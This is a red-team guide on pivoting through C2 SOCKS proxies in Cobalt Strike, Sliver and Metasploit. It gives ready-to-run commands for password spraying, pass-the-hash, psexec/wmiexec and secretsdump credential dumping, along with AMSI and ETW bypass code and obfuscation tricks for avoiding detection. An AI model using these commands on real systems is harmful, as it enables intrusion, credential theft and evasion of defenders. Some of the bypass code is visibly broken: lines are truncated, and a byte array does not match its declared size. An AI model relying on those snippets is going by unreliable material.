4. C2_SOCKS

#redteam #opsec #proxychains #c2 #pivoting #cobalt-strike #sliver #metasploit

Stay Low: Proxychains/Pivoting OPSEC — Scenario 4: C2 SOCKS Proxy

Part 4 of 4-part series

Scenario: You have a C2 beacon/agent session on a compromised internal host. You want to pivot through it using SOCKS proxy to reach deeper network segments.

Key Difference from Scenario 3: Your tunnel is maintained by C2 infrastructure (Cobalt Strike, Sliver, Metasploit), not direct SSH/Chisel. This creates a unique detection profile tied to beacon behavior, sleep intervals, and C2 communication patterns.

C2 SOCKS Overview
Framework-Specific Setup
Proxychains Configuration
Detection Surface Analysis
OPSEC Hardening
Traffic Behavior Patterns
Double-Pivot Through Multiple Beacons
Lateral Movement Through C2 SOCKS
OPSEC Risk Matrix
Quick Reference

C2 SOCKS Overview

Why C2 SOCKS is Different

Aspect	SSH/Chisel (Scenario 3)	C2 SOCKS (Scenario 4)
Tunnel Protocol	Direct TCP/SSH	Encrypted C2 channel
Sleep Impact	None	HIGH — beacon sleep = SOCKS latency
Connection Pattern	Persistent tunnel	Intermittent beacon check-ins
Detection Profile	SSH traffic, new listening ports	C2 traffic + SOCKS correlation
Host Artifacts	SSH binaries, tunneling processes	C2 beacon + SOCKS proxy thread
Network Artifacts	SSH handshakes, TCP streams	C2 protocol + multiplexed SOCKS
JA3/JA4 Fingerprint	SSH client fingerprint	C2 malleable profile
Authentication	SSH keys/passwords	C2 session authentication

When to Use C2 SOCKS

✅ Use C2 SOCKS when:

You already have a C2 beacon/agent on the pivot host
SSH/Chisel would be too noisy (new process, new listening port)
You need to blend with existing C2 traffic
You want to minimize host artifacts (no new binaries)
EDR is present (C2 evasion already solved)

❌ Avoid C2 SOCKS when:

Beacon has high sleep time (>10s) — latency becomes unbearable
You need low-latency scanning (use SSH -D instead)
C2 infrastructure is already burned
You need UDP/ICMP (C2 SOCKS is TCP-only)

Framework-Specific Setup

Cobalt Strike SOCKS

Basic SOCKS Proxy

# Start SOCKS4a proxy on teamserver port 8080
beacon> socks 8080

# View active SOCKS proxies
Cobalt Strike GUI: View -> Proxy Pivots

# Stop SOCKS proxy
beacon> socks stop

What Gets Logged:

Layer	Event	Source
Teamserver	SOCKS proxy started on port 8080	Teamserver logs
Beacon Host	No new process (handled by beacon)	Process monitor: CLEAN
Network	C2 traffic volume increases	NetFlow, IDS
Memory	SOCKS proxy thread in beacon memory	Memory forensics

SOCKS5 with Authentication

# Start SOCKS5 with username/password authentication
beacon> socks 8080 socks5 disableNoAuth username password enableLogging

# Parameters:
# - socks5: Use SOCKS5 instead of SOCKS4a
# - disableNoAuth: Require authentication (prevents accidental exposure)
# - username password: Authentication credentials
# - enableLogging: Log SOCKS connections to teamserver console

OPSEC Considerations:

🟢 NoAuth disabled — Prevents unauthorized access if port exposed
🟡 Logging enabled — Good for debugging, but creates server-side logs
🟠 SOCKS5 — More detectable than SOCKS4a (version detection in IDS)

Proxychains Configuration

# /etc/proxychains4.conf
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000

[ProxyList]
socks5 <TEAMSERVER_IP> 8080 username password

Sleep Time Impact on SOCKS

Beacon Sleep	SOCKS Latency	Tool Compatibility	OPSEC Rating
0s (interactive)	<100ms	✅ All tools	🔴 HIGH RISK
1-5s	100-500ms	✅ Most tools	🟠 MEDIUM
10s	1-5s	⚠️ Timeouts on fast scans	🟡 LOW
30s+	10s+	❌ Most tools fail	🟢 ZERO (but unusable)

Recommendation: Temporarily lower beacon sleep for active pivoting, then restore:

# Lower sleep for pivoting session
beacon> sleep 3

# Perform scanning/lateral movement
[attacker@box ~]$ proxychains nmap -sT -p445,3389 192.168.10.0/24

# Restore original sleep
beacon> sleep 60 20

Sliver SOCKS

Start SOCKS5 Proxy

# Interactive session
sliver (SESSION_NAME) > socks5 start -P 1080

[*] Started SOCKS5 proxy on 127.0.0.1:1080

# List active SOCKS proxies
sliver (SESSION_NAME) > socks5

# Stop SOCKS proxy
sliver (SESSION_NAME) > socks5 stop -i <PROXY_ID>

What Gets Logged:

Layer	Event	Source
Sliver Server	SOCKS5 proxy started on port 1080	Server logs
Implant Host	No new process (handled by implant)	Process monitor: CLEAN
Network	Increased C2 traffic volume	NetFlow
Memory	SOCKS5 handler in implant memory	Memory forensics

Named Pipe Pivots (SMB-based)

# Create named pipe listener on compromised host
sliver (SESSION_NAME) > named-pipe --name lol

[*] Created named pipe: \\HOSTNAME\pipe\lol

# Connect to named pipe from another session
sliver > use --session-id <OTHER_SESSION_ID>
sliver (OTHER_SESSION) > connect --name \\HOSTNAME\pipe\lol

Named Pipe Format:

\\HOSTNAME\.\pipe\PIPE_NAME

OPSEC Considerations:

🟢 No listening network port — Traffic over SMB (port 445)
🟡 Named pipes are logged — Windows Event ID 5145 (SMB access), Sysmon Event ID 17/18
🔴 Common pipe names are flagged — Avoid msagent_*, postex_*, status_*

TCP Pivots

# Start TCP pivot on compromised host
sliver (SESSION_NAME) > pivots tcp -l 0.0.0.0:9090

[*] Started TCP pivot on 0.0.0.0:9090

# Connect from another session
sliver > use --session-id <OTHER_SESSION_ID>
sliver (OTHER_SESSION) > connect <PIVOT_IP>:9090

Detection Risk:

🔴 New listening port — Detected by netstat, EDR host firewall alerts
🟠 High-numbered random port — Common C2 pattern

Metasploit SOCKS

Autoroute Setup

# Add route through meterpreter session
msf6 > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set SESSION 1
msf6 post(multi/manage/autoroute) > set SUBNET 192.168.10.0
msf6 post(multi/manage/autoroute) > set NETMASK 255.255.255.0
msf6 post(multi/manage/autoroute) > run

[*] Route added to subnet 192.168.10.0/255.255.255.0 through session 1

Verify routes:

msf6 > route print

Active Routing Table
====================
   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.10.0       255.255.255.0      Session 1

Start SOCKS Proxy

msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
msf6 auxiliary(server/socks_proxy) > set SRVPORT 1080
msf6 auxiliary(server/socks_proxy) > set VERSION 4a
msf6 auxiliary(server/socks_proxy) > run -j

[*] Auxiliary module running as background job 0
[*] Starting the SOCKS proxy server

Version Selection:

SOCKS4a (recommended) — Better tool compatibility, fewer IDS signatures
SOCKS5 — More features (auth, UDP), but noisier

Proxychains Configuration

# /etc/proxychains4.conf
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000

[ProxyList]
socks4 127.0.0.1 1080

C2 Framework Comparison

Feature	Cobalt Strike	Sliver	Metasploit
SOCKS Version	SOCKS4a/SOCKS5	SOCKS5	SOCKS4a/SOCKS5
Authentication	User/Pass (SOCKS5 only)	None	None
Named Pipe Pivot	❌ No	✅ Yes (SMB-based)	❌ No
TCP Pivot	❌ No	✅ Yes	✅ Yes (portfwd)
Reverse SOCKS	❌ No	✅ Yes	❌ No
Sleep Impact	⚠️ High (beacon check-in)	⚠️ Moderate	⚠️ Moderate
IPv6 Support	❌ No	✅ Yes	✅ Yes
GUI Management	✅ View -> Proxy Pivots	❌ CLI only	❌ CLI only
Logging	Optional (enableLogging)	Server logs	Console output
Host Artifacts	🟢 No new process	🟢 No new process	🟢 No new process
Network Detection	JA3/JA4 of malleable profile	Default TLS fingerprint	Meterpreter C2 patterns

Proxychains Configuration

Standard Single-Beacon Proxy

# /etc/proxychains4.conf
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000

[ProxyList]
socks4 127.0.0.1 1080  # Metasploit
# OR
socks5 <TEAMSERVER_IP> 8080 username password  # Cobalt Strike
# OR
socks5 127.0.0.1 1080  # Sliver

Double-Pivot Through Multiple Beacons

Scenario: Beacon A (DMZ) → Beacon B (internal) → Target

# /etc/proxychains4.conf
strict_chain
proxy_dns
tcp_read_time_out 30000  # Doubled timeout for chained delay
tcp_connect_time_out 15000

[ProxyList]
# First hop: Beacon A SOCKS proxy
socks5 <TEAMSERVER_IP> 8080 user1 pass1

# Second hop: Beacon B SOCKS proxy (reachable through Beacon A)
socks5 192.168.10.50 9090 user2 pass2

OPSEC Notes:

🔴 Extreme latency — Each hop adds beacon sleep time
🟠 Connection timing correlation — Both beacons must check-in for SOCKS to work
🟡 Timeouts must be generous — 30s+ for chained beacons with 5s+ sleep

Per-Command Proxy Configuration

# Use different SOCKS proxies for different targets
proxychains -f /tmp/beacon_a.conf nmap -sT -p445 192.168.10.0/24
proxychains -f /tmp/beacon_b.conf crackmapexec smb 192.168.20.0/24

Detection Surface Analysis

What Defenders See

Network-Level Detection

Indicator	Detection Method	SIEM Correlation
Increased C2 traffic volume	NetFlow anomaly (bytes out spike)	Beacon check-in + large data transfer
SOCKS version detection	DPI inspection of C2 channel payload	IDS rule: SOCKS handshake in C2 traffic
Connection bursts	Multiple connections to internal targets within beacon sleep window	Temporal correlation: C2 callback → internal connections
JA3/JA4 fingerprinting	TLS handshake analysis (if C2 uses HTTPS)	Match to known C2 malleable profiles
DNS queries through proxy	Recursive DNS queries from compromised host	Abnormal DNS pattern for that host
Port scanning patterns	IDS signatures (e.g., TCP SYN to 100+ hosts)	Source IP = known compromised host

Host-Level Detection

Artifact	EDR Detection	Forensic Evidence
No new listening port (CS/Sliver)	🟢 CLEAN (SOCKS handled by beacon thread)	Netstat shows no port 1080/8080
New listening port (Sliver TCP pivot)	🔴 EDR alert: Suspicious listening port	Netstat: `0.0.0.0:9090 LISTENING`
Memory artifacts	Process memory dump: SOCKS proxy structures	Beacon memory contains SOCKS handshake buffers
Named pipe creation (Sliver)	Sysmon Event ID 17/18	`\\.\pipe\<CUSTOM_NAME>` in event logs
SMB traffic spike	Windows Event ID 5145 (SMB access)	Multiple SMB connections to named pipe
Outbound connections from beacon	EDR alert: Process making unusual network connections	Beacon process connecting to internal hosts

SIEM Correlation Rules

Example: Detect C2 SOCKS Pivoting

-- Splunk SPL
index=network_traffic src_ip=<COMPROMISED_HOST>
| stats dc(dest_ip) as unique_targets by src_ip
| where unique_targets > 20 AND timespan < 300s
| join src_ip [search index=edr process_name=<BEACON_PROCESS>]

Logic: Compromised host contacts 20+ unique internal IPs within 5 minutes, AND the beacon process is still running.

Example: Detect Beacon Sleep Timing + SOCKS Activity

# Pseudocode for timing correlation
if (beacon_checkin_time + 0-5s == internal_connection_burst):
    alert("Possible C2 SOCKS pivoting detected")

OPSEC Hardening

Cobalt Strike Specific

1. Malleable C2 Profile Tuning

Problem: Default malleable profiles have known JA3/JA4 fingerprints.

Solution: Customize your profile to mimic legitimate traffic.

# malleable.profile excerpt
https-certificate {
    set CN       "*.microsoft.com";
    set O        "Microsoft Corporation";
    set validity "365";
}

http-get {
    set uri "/updates /download /api/status";
    client {
        header "Accept" "*/*";
        header "User-Agent" "Microsoft-CryptoAPI/6.3";
    }
}

2. Limit SOCKS Exposure

# Bind SOCKS only to localhost, then SSH tunnel to it
beacon> socks 1080

# On your attack box:
ssh -L 8080:127.0.0.1:1080 user@teamserver
proxychains -f /tmp/local_socks.conf <TOOL>

Benefit: SOCKS port not exposed on teamserver's external interface.

3. Rotate Beacon Sleep Dynamically

# Before scanning burst
beacon> sleep 2

# After scanning burst
beacon> sleep 60 20  # 60s ±20% jitter

4. Use Beacon in "Interactive Mode" Only During Active Pivoting

# Agscript to automate sleep adjustment
on beacon_initial {
    bsleep($1, 60, 20);  # Default: 60s sleep
}

command pivot_mode {
    bsleep($1, 3);  # Lower to 3s for pivoting
    blog($1, "[*] Entering pivot mode (sleep 3s)");
}

command stealth_mode {
    bsleep($1, 120, 30);  # Raise to 120s for stealth
    blog($1, "[*] Entering stealth mode (sleep 120s)");
}

Sliver Specific

1. Randomize Named Pipe Names

# BAD: Predictable pipe name
sliver (SESSION) > named-pipe --name msagent_pipe

# GOOD: Random pipe name
sliver (SESSION) > named-pipe --name $(openssl rand -hex 8)

2. Use mTLS for C2 (Not HTTP/HTTPS)

Why: HTTP/HTTPS C2 has JA3/JA4 fingerprint exposure. mTLS uses custom certs.

# Generate mTLS implant
sliver > generate --mtls <LISTENER_IP>:8443 --os windows --save /tmp/

3. Avoid TCP Pivots (Use Named Pipes)

Detection Risk:

TCP pivot = new listening port = EDR alert
Named pipe = SMB traffic = blends with normal Windows traffic

Metasploit Specific

1. Use SOCKS4a Instead of SOCKS5

msf6 auxiliary(server/socks_proxy) > set VERSION 4a

Reason: SOCKS5 has more IDS signatures (authentication phase, UDP support).

2. Rotate Meterpreter Session

Problem: Long-lived Meterpreter sessions are detectable (artifact staging, memory signatures).

Solution: Rotate sessions every few hours.

# Migrate to new process
meterpreter > ps
meterpreter > migrate <PID_OF_LONG_RUNNING_SERVICE>

# Or create new session
meterpreter > background
msf6 > use exploit/windows/local/persistence_service

3. Bind SOCKS to Localhost Only

msf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1

Prevents accidental exposure if Metasploit server is compromised.

Traffic Behavior Patterns

Beacon Sleep Impact on Scanning

Scenario: You run proxychains nmap -sT -p445 192.168.10.1-50 through a Cobalt Strike beacon with 10s sleep.

What Happens:

T+0s:    Beacon checks in
T+0.5s:  SOCKS proxy forwards nmap connection to 192.168.10.1:445
T+0.6s:  Target responds, nmap gets result
T+10s:   Beacon checks in again
T+10.5s: SOCKS proxy forwards nmap connection to 192.168.10.2:445
T+10.6s: Target responds
...

Timeline:

Time	Event	Network Traffic
T+0s	Beacon check-in	C2 callback (HTTPS)
T+0.5s	Nmap → Target 1	SYN to 192.168.10.1:445
T+10s	Beacon check-in	C2 callback (HTTPS)
T+10.5s	Nmap → Target 2	SYN to 192.168.10.2:445
T+20s	Beacon check-in	C2 callback (HTTPS)

Detection Pattern:

Temporal correlation: Internal TCP SYN spike immediately after C2 callback
Periodicity: Connection burst every 10s (matches beacon sleep)

Mitigation:

Add jitter: beacon> sleep 10 5 (10s ±50% = 5-15s jitter)
Use random_chain in proxychains (if multiple SOCKS proxies available)
Rate-limit your scanning: nmap --max-rate 5

Connection Fingerprinting

Q: Can IDS detect that connections are coming through C2 SOCKS?

A: Yes, via timing correlation and TCP fingerprinting.

Timing Correlation

Normal direct connection:

User -> Target: SYN at T+0ms
User <- Target: SYN-ACK at T+5ms (network RTT)

Through C2 SOCKS:

User -> Teamserver: SOCKS request at T+0ms
Teamserver -> Beacon: Queued until next check-in at T+<SLEEP_TIME>
Beacon -> Target: SYN at T+<SLEEP_TIME>
Beacon <- Target: SYN-ACK at T+<SLEEP_TIME+RTT>
Beacon -> Teamserver: Response queued until next check-in at T+<2*SLEEP_TIME>
Teamserver -> User: SOCKS response at T+<2*SLEEP_TIME>

IDS Detection:

Abnormal RTT (round-trip time) — 10-60s instead of 5-50ms
Periodicity in connection bursts (every SLEEP_TIME seconds)

Double-Pivot Through Multiple Beacons

Scenario

Network Topology:

Attacker -> Beacon A (DMZ) -> Beacon B (Internal) -> Target (Secure Zone)

Goal: Access Target in Secure Zone through two SOCKS proxies.

Setup

Step 1: Start SOCKS on Beacon A

# Cobalt Strike: Beacon A
beacon> socks 8080

Step 2: Start SOCKS on Beacon B (Reachable Through Beacon A)

Problem: You need to send commands to Beacon B, but it's only reachable through Beacon A.

Solution: Use SSH jump host or nested proxychains.

Option 1: SSH Jump Through Beacon A's Network

# Assume Beacon A allows SSH access to Beacon B's network
ssh -J user@beacon_a_ip user@beacon_b_ip

# On Beacon B, start another C2 session with SOCKS
sliver (BEACON_B_SESSION) > socks5 start -P 9090

Option 2: Use Beacon A's SOCKS to Reach Beacon B's C2 Listener

If Sliver/Metasploit listener is accessible through Beacon A:

# Proxychains config to reach Beacon B's listener
# /tmp/beacon_a_proxy.conf
[ProxyList]
socks5 <TEAMSERVER_A_IP> 8080

# Connect to Beacon B's listener through Beacon A
proxychains -f /tmp/beacon_a_proxy.conf sliver
sliver > sessions
sliver > use --session-id <BEACON_B_SESSION>
sliver (BEACON_B) > socks5 start -P 9090

Step 3: Configure Proxychains for Double-Pivot

# /etc/proxychains4.conf
strict_chain
proxy_dns
tcp_read_time_out 60000  # 60s timeout
tcp_connect_time_out 30000

[ProxyList]
# First hop: Beacon A SOCKS
socks5 <TEAMSERVER_A_IP> 8080 user1 pass1

# Second hop: Beacon B SOCKS (reachable through Beacon A)
socks5 <BEACON_B_INTERNAL_IP> 9090

Step 4: Test Double-Pivot

# Verify connectivity
proxychains curl -I http://<TARGET_SECURE_ZONE_IP>

# Scan secure zone
proxychains nmap -sT -Pn -p445,3389 <TARGET_SECURE_ZONE_IP>

OPSEC Considerations for Double-Pivot

Risk	Impact	Mitigation
Extreme latency	Each hop adds 5-60s	Lower beacon sleep on both beacons during active pivoting
Beacon A & B must check in simultaneously	If Beacon A sleeps while Beacon B is active, SOCKS chain breaks	Synchronize beacon sleep times, or use interactive mode
Doubled network correlation	Both beacons show C2 callback → internal connection pattern	Add jitter, stagger scanning
SOCKS chain failure cascade	If Beacon A dies, Beacon B becomes unreachable	Maintain fallback access to Beacon B (persistence)

Lateral Movement Through C2 SOCKS

CrackMapExec (CME)

# Password spray through SOCKS
proxychains crackmapexec smb 192.168.10.0/24 -u users.txt -p 'Winter2024!'

# Pass-the-Hash through SOCKS
proxychains crackmapexec smb 192.168.10.50 -u admin -H aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71

# Execute command
proxychains crackmapexec smb 192.168.10.50 -u admin -H <HASH> -x "whoami"

OPSEC Notes:

🟡 CME creates SMB sessions — logged in Windows Event ID 4624 (logon) and 4634 (logoff)
🟠 Rapid SMB connections to multiple hosts — IDS signature

Evil-WinRM

# WinRM over SOCKS
proxychains evil-winrm -i 192.168.10.50 -u admin -p 'Password123'

# Pass-the-Hash
proxychains evil-winrm -i 192.168.10.50 -u admin -H <NTLM_HASH>

OPSEC Notes:

🟡 WinRM creates Event ID 4648 (explicit credential logon) on target
🟠 WinRM uses ports 5985 (HTTP) or 5986 (HTTPS) — monitored by some orgs

xfreerdp (RDP)

# RDP through SOCKS (requires proxychains-ng with DNS resolution)
proxychains xfreerdp /v:192.168.10.50 /u:admin /p:'Password123' /cert-ignore

# Pass-the-Hash (Restricted Admin mode required)
proxychains xfreerdp /v:192.168.10.50 /u:admin /pth:<NTLM_HASH> /cert-ignore

OPSEC Notes:

🔴 RDP logon creates Event ID 4624 (Type 10 logon)
🔴 RDP through SOCKS has high latency (beacon sleep) — may disconnect
🟠 Restricted Admin RDP is often disabled by security teams

Impacket Tools

psexec.py

proxychains psexec.py DOMAIN/admin@192.168.10.50 -hashes aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71

Logged Events:

Windows Event ID 7045 (service installation) — PSEXESVC
Sysmon Event ID 1 (process creation) — cmd.exe spawned by service

wmiexec.py

proxychains wmiexec.py DOMAIN/admin@192.168.10.50 -hashes aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71

Logged Events:

Windows Event ID 4688 (process creation via WMI)
WMI event subscription logs

secretsdump.py

# Dump SAM/NTDS through SOCKS
proxychains secretsdump.py DOMAIN/admin@192.168.10.50 -hashes aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71

OPSEC Notes:

🔴 Dumps NTDS.dit — Extremely high-value action, heavily monitored
🔴 Event ID 4662 (object access) — DCSync detected if targeted at AD objects
🟠 SMB access to ADMIN$ — Event ID 5145

SocksOverRDP Technique (Bonus)

Scenario: You already have RDP access to a host, and want to pivot further without installing tools.

Step 1: Enable Dynamic Port Forwarding Through RDP

# On Kali: Create RDP tunnel with SOCKS proxy on RDP session
xfreerdp /v:192.168.10.50 /u:admin /p:'Password123' /dynamic-resolution /cert-ignore \
  /ssh-agent \
  +clipboard

# Use SocksOverRDP (https://github.com/nccgroup/SocksOverRDP)
# 1. Upload SocksOverRDP-Plugin.dll to %APPDATA% on target
# 2. Load it in RDP session
# 3. SOCKS proxy becomes available on localhost:1080 of RDP session

Benefit: No need to install Chisel/SSH on target. SOCKS runs inside RDP channel.

Detection Risk:

🟡 SocksOverRDP DLL loaded in mstsc.exe or rdpclip.exe memory
🟠 Unusual RDP traffic volume

OPSEC Risk Matrix

Action	Detection Risk	Windows Event ID	IDS Signature	Mitigation
Cobalt Strike SOCKS start	🟢 ZERO (no host artifact)	None	None	N/A
Sliver SOCKS5 start	🟢 ZERO (no host artifact)	None	None	N/A
Metasploit SOCKS4a start	🟢 ZERO (on attacker box)	None	None	N/A
Sliver TCP pivot	🔴 HIGH (new listening port)	None (no Windows event)	Port scan detects open port	Use named pipe pivot instead
Sliver named pipe pivot	🟡 LOW-MEDIUM	5145 (SMB access), Sysmon 17/18 (pipe)	SMB traffic spike	Use random pipe name
Beacon SOCKS + scanning	🟠 MEDIUM-HIGH	None on beacon host, but IDS detects scanning	IDS: Port scan from compromised host	Rate-limit scans, add jitter
C2 callback + SOCKS burst	🔴 HIGH (temporal correlation)	None	SIEM: C2 callback → internal connections within 5s	Randomize beacon sleep with jitter
Double-pivot (2 beacons)	🔴 HIGH (two correlation points)	None	SIEM: Both beacons correlate to internal scanning	Stagger beacon check-ins
CME password spray	🟠 MEDIUM-HIGH	4625 (failed logon), 4624 (success)	IDS: SMB brute-force	Slow down attempts (--delay)
Evil-WinRM	🟡 LOW-MEDIUM	4648 (explicit logon), 4624 (Type 3)	None (WinRM is legitimate)	Use local admin account (less monitored)
PSExec through SOCKS	🔴 HIGH	7045 (service install), 4688 (process)	EDR: PSEXESVC service	Use WMI instead
WMIExec through SOCKS	🟠 MEDIUM-HIGH	4688 (WMI process), WMI logs	EDR: WMI remote execution	Use Invoke-Command (native PowerShell)
secretsdump (DCSync)	🔴 HIGH	4662 (directory service access)	SIEM: DCSync pattern	Use vshadow + robocopy instead

Quick Reference

Cobalt Strike SOCKS Setup

# Start SOCKS4a on teamserver port 8080
beacon> socks 8080

# Start SOCKS5 with auth
beacon> socks 8080 socks5 disableNoAuth user pass enableLogging

# Lower beacon sleep for pivoting
beacon> sleep 3

# Stop SOCKS
beacon> socks stop

Proxychains config:

[ProxyList]
socks5 <TEAMSERVER_IP> 8080 user pass

Sliver SOCKS Setup

# Start SOCKS5
sliver (SESSION) > socks5 start -P 1080

# Named pipe pivot (stealthier)
sliver (SESSION) > named-pipe --name $(openssl rand -hex 8)

# TCP pivot (noisier)
sliver (SESSION) > pivots tcp -l 0.0.0.0:9090

# Stop SOCKS
sliver (SESSION) > socks5 stop -i <PROXY_ID>

Proxychains config:

[ProxyList]
socks5 127.0.0.1 1080

Metasploit SOCKS Setup

# Add route
msf6 > use post/multi/manage/autoroute
msf6 > set SESSION 1; set SUBNET 192.168.10.0; run

# Start SOCKS4a
msf6 > use auxiliary/server/socks_proxy
msf6 > set SRVHOST 127.0.0.1; set SRVPORT 1080; set VERSION 4a; run -j

Proxychains config:

[ProxyList]
socks4 127.0.0.1 1080

Lateral Movement Commands

# CrackMapExec
proxychains crackmapexec smb 192.168.10.0/24 -u admin -H <HASH>

# Evil-WinRM
proxychains evil-winrm -i 192.168.10.50 -u admin -H <HASH>

# PSExec
proxychains psexec.py DOMAIN/admin@192.168.10.50 -hashes :<HASH>

# WMIExec
proxychains wmiexec.py DOMAIN/admin@192.168.10.50 -hashes :<HASH>

# secretsdump
proxychains secretsdump.py DOMAIN/admin@192.168.10.50 -hashes :<HASH>

Debugging Connection Issues

# Test SOCKS proxy directly
curl --socks5 127.0.0.1:1080 http://192.168.10.50

# Verify route (Metasploit)
msf6 > route print

# Check beacon sleep time (Cobalt Strike)
beacon> sleep

# Increase proxychains timeout
tcp_read_time_out 30000
tcp_connect_time_out 15000

Advanced EDR Evasion Through C2 SOCKS

AMSI and ETW Bypass Techniques

When executing PowerShell commands through C2 SOCKS tunnels, AMSI (Antimalware Scan Interface) and ETW (Event Tracing for Windows) provide additional detection layers:

AMSI Bypass Methods

In-Memory AMSI Bypass (PowerShell):

# Method 1: Patch AmsiScanBuffer function
$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @Copy($buf, 0, $ptr, 1

# Method 2: Set AmsiInitFailed to $true  
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

# Method 3: Null AmsiContext
$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @Copy($buf, 0, $ptr, 1

# Method 4: COM object hijacking
$comHijack = New-Object -ComObject WScript.Shell; $comHijack.RegWrite("HKEY_CURRENT_USER\Software\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32\","$env:SystemRoot\System32\kernel32.dll","REG_SZ")

C# AMSI Bypass (Execute via C2):

using System;
using System.Runtime.InteropServices;

public class AmsiBypass {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
    
    public static void Bypass() {
        IntPtr lib = LoadLibrary("amsi.dll");
        IntPtr addr = GetProcAddress(lib, "AmsiScanBuffer");
        uint oldProtect;
        VirtualProtect(addr, (UIntPtr)5, 0x40, out oldProtect);
        Marshal.Copy(new byte[5] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }, 0, addr, 5);
    }
}

ETW Bypass Methods

Disable ETW Providers:

# Disable PowerShell ETW provider
[Reflection.Assembly]::LoadWithPartialName("System.Core")
$etwProvider = [Ref].Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider")
$etwProvider.GetField("etwProvider","NonPublic,Static").SetValue($null, $null)

# Patch EtwEventWrite function
$ntdllHandle = [System.Runtime.InteropServices.Marshal]::GetHINSTANCECurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }
$etwEventWriteAddr = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll EtwEventWrite), [System.Runtime.InteropServices.UnmanagedFunctionPointer])

ETW Provider Enumeration:

# List active ETW providers (reconnaissance)
Get-WinEvent -ListProvider * | Where-Object {$_.Name -match "Microsoft-Windows-PowerShell"} | Select-Object Name, Id

# Disable specific ETW provider by GUID
logman stop "Microsoft-Windows-PowerShell/Operational" -ets

Sleep Obfuscation Techniques

Advanced C2 frameworks use sleep obfuscation to hide beacon memory during dormant periods:

Sleep Obfuscation Methods

Technique	Description	OPSEC Benefit	Compatibility
Ekko	ROP-based sleep using SetTimer API	Hides entire PE from memory scans	Cobalt Strike, custom loaders
Foliage	Hardware breakpoint + VEH sleep	Uses legitimate Windows APIs	Modern C2 frameworks
Zilean	Module stomping + sleep	Overwrites PE header during sleep	Beacon Object Files (BOF)
Gargoyle	ROP sleep with stack preservation	No in-memory artifacts during sleep	Custom C2 implementations
Nighthawk	Hardware breakpoints for sleep	Bypasses memory scanners completely	Havoc C2, custom agents

Implementation Example (Conceptual)

// Simplified Ekko-style sleep obfuscation
VOID EkkoSleep(DWORD dwMilliseconds) {
    // 1. Get current thread context
    CONTEXT ctx;
    ctx.ContextFlags = CONTEXT_FULL;
    GetThreadContext(GetCurrentThread(), &ctx);
    
    // 2. Encrypt beacon memory
    XorEncryptMemory(BeaconBase, BeaconSize, XorKey);
    
    // 3. Set hardware breakpoint on return address
    SetHardwareBreakpoint(ctx.Rip);
    
    // 4. Sleep using legitimate API
    Sleep(dwMilliseconds);
    
    // 5. VEH handler will decrypt memory and restore execution
}

Sleep Obfuscation OPSEC Benefits:

🟢 Memory scans during sleep return nothing — Encrypted or absent PE
🟢 No suspicious sleep APIs — Uses SetTimer, CreateThreadpoolTimer, etc.
🟡 VEH registration visible — Vectored Exception Handlers still detectable
🟠 Hardware breakpoint usage — May trigger advanced EDR behavioral analysis

PowerShell Obfuscation for C2 Operations

When using PowerShell through C2 SOCKS, apply multiple obfuscation layers:

Command Line Obfuscation

Base64 Encoding:

# Original command
Get-Process | Where-Object {$_.Name -match "defender"}

# Obfuscated
$cmd = "Get-Process | Where-Object {$_.Name -match `"defender`"}"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd)
$encoded = [Convert]::ToBase64String($bytes)
powershell -EncodedCommand $encoded

Variable Concatenation:

# Split commands into variables
$p1 = "Get-Pro"
$p2 = "cess"
$p3 = " | Where-Ob"
$p4 = "ject"
$cmd = $p1 + $p2 + $p3 + $p4 + " {`$_.Name -match `"defender`"}"
Invoke-Expression $cmd

Case Randomization:

# Random case variation
gEt-PrOcEsS | wHeRe-ObJeCt {$_.nAmE -MaTcH "dEfEnDeR"}

String Obfuscation

Character Substitution:

# Replace characters with ASCII/Unicode equivalents  
$defendeR = "d`ef`en`der".Replace('`','')
Get-Process | Where-Object {$_.Name -match $defendeR}

# Unicode character substitution
$ⅆefender = "defender"  # Unicode 'ⅆ' (U+2146) looks like 'd'

Format String Obfuscation:

# Using -f operator
$pattern = "{0}{1}{2}{3}{4}{5}{6}{7}" -f 'd','e','f','e','n','d','e','r'
Get-Process | Where-Object {$_.Name -match $pattern}

PowerShell Execution Policy Bypass

# Execution policy bypasses
powershell -ExecutionPolicy Bypass -Command "Get-Process"
powershell -ExecutionPolicy Unrestricted -Command "Get-Process" 
powershell -ExecutionPolicy RemoteSigned -Command "Get-Process"

